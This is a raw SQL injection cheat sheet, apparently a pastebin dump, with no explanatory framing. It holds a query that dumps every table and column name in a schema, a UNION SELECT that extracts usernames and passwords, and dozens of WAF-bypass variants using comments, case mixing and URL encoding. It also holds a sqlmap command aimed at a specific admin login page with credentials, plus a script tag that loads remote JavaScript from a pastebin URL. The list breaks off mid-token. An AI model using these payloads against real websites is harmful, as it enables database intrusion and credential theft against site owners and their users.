/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_sc

1.  
2. /*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
3.  
4.  
5. 0x3C6C693E
6.  
7. +union+select+1,2,concat(username,0x0a,password),4,5,6,7+from+user--+
8.  
9. sqlmap -u "http://mms.ias.us/admin/index.php?Page=&Action=Login" --data="ss_username=admin&ss_password=tauapaan&ss_takemeto=index.php&SubmitButton=Login" --random-agent --risk=2 --level=2 --dbs
10.  
11.  
12. concat(0x496e6a656374204279204d722e42726f5f5478,0x3c62723e,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/)
13.  
14. /*!5000union*/+/!*50000select*/
15.  
16. <script type="text/javascript" src="https://pastebin.com/raw/efVD5vYx"></script>
17.  
18. Bypass Waff
19.  
20. /**/ORDER/**/BY/**/
21. /*!order*/+/*!by*/
22. /*!ORDER BY*/
23. /*!50000ORDER BY*/
24. /*!50000ORDER*//**//*!50000BY*/
25. /*!12345ORDER*/+/*!BY*/
26.  
27. /*!UNiOn*/ /*!SeLEct*/
28.  
29. %55nion(%53elect 1,2,3)-- -
30.  
31. +union+distinct+select+
32.  
33. +union+distinctROW+select+
34.  
35. /**//*!12345UNION SELECT*//**/
36.  
37. concat(0x223e,@@version)
38.  
39. concat(0x273e27,version(),0x3c212d2d)
40.  
41. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
42.  
43. concat(0x223e,@@version,0x3c696d67207372633d22)
44.  
45. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62​723e)
46.  
47. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
48.  
49. concat(‘’,@@version,’’)
50.  
51. /**//*!50000UNION SELECT*//**/
52.  
53. /**/UNION/**//*!50000SELECT*//**/
54.  
55. /*!50000UniON SeLeCt*/
56.  
57. union /*!50000%53elect*/
58.  
59. +#uNiOn+#sEleCt
60.  
61. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
62.  
63. /*!%55NiOn*/ /*!%53eLEct*/
64.  
65. /*!u%6eion*/ /*!se%6cect*/
66.  
67. +un/**/ion+se/**/lect
68.  
69. uni%0bon+se%0blect
70.  
71. %2f**%2funion%2f**%2fselect
72.  
73. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
74.  
75. REVERSE(noinu)+REVERSE(tceles)
76.  
77. /*--*/union/*--*/select/*--*/
78.  
79. union (/*!/**/ SeleCT */ 1,2,3)
80.  
81. /*!union*/+/*!select*/
82.  
83. union+/*!select*/
84.  
85. /**/union/**/select/**/
86.  
87. /**/uNIon/**/sEleCt/**/
88.  
89. /**//*!union*//**//*!select*//**/
90.  
91. /*!uNIOn*/ /*!SelECt*/
92.  
93. +union+distinct+select+
94.  
95. +union+distinctROW+select+
96.  
97. +UnIOn%0d%0aSeleCt%0d%0a
98.  
99. UNION/*&test=1*/SELECT/*&pwn=2*/
100.  
101. un?+un/**/ion+se/**/lect+
102.  
103. +UNunionION+SEselectLECT+
104.  
105. +uni%0bon+se%0blect+
106.  
107. %252f%252a*/union%252f%252a /select%252f%252a*/
108.  
109. /%2A%2A/union/%2A%2A/select/%2A%2A/
110.  
111. %2f**%2funion%2f**%2fselect%2f**%2f
112.  
113. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
114.  
115. /*!UnIoN*/SeLecT+
116.  
117. Union Select by PASS with Url Encoded Method:
118.  
119. %55nion(%53elect)
120.  
121. union%20distinct%20select
122.  
123. union%20%64istinctRO%57%20select
124.  
125. union%2053elect
126.  
127. %23?%0auion%20?%23?%0aselect
128.  
129. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
130.  
131. %55nion %53eLEct
132.  
133. u%6eion se%6cect
134.  
135. unio%6e %73elect
136.  
137. unio%6e%20%64istinc%74%20%73elect
138.  
139. uni%6fn distinct%52OW s%65lect
140.  
141. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7